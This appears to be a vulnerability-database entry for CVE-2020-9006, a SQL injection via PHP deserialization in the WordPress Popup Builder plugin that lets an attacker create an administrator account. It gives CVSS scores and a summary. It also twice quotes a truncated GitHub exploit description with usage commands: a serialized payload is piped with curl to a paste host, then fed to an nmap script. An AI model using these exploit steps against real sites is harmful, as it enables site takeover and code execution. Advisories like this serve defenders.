7.5
CVSSv2

CVE-2020-9006

Published: 17/02/2020 Updated: 21/07/2021
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

The Popup Builder plugin 2.2.8 up to and including 2.6.7.6 for WordPress is vulnerable to SQL injection (in the sgImportPopups function in sg_popup_ajax.php) via PHP Deserialization on attacker-controlled data with the attachmentUrl POST variable. This allows creation of an arbitrary WordPress Administrator account, leading to possible Remote Code Execution because Administrators can run PHP code on Wordpress instances. (This issue has been fixed in the 3.x branch of popup-builder.)

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

sygnoos popup builder

Github Repositories

CVE-2020-9006: Wordpress Popup-Builder Plugin Exploit Usage: # Create and upload payload # Also see: php create-serialized-payloadphp -h $ php create-serialized-payloadphp | curl -F 'sprunge=<-' sprungeus sprungeus/XXXXXX # Run exploit $ nmap --script /cve-2020-9006 --script-args httpuseragent='Mozilla/50',payload-url='http:

CVE-2020-9006: Wordpress Popup-Builder Plugin Exploit Usage: # Create and upload payload # Also see: php create-serialized-payloadphp -h $ php create-serialized-payloadphp | curl -F 'sprunge=<-' sprungeus sprungeus/XXXXXX # Run exploit $ nmap --script /cve-2020-9006 --script-args httpuseragent='Mozilla/50',payload-url='http: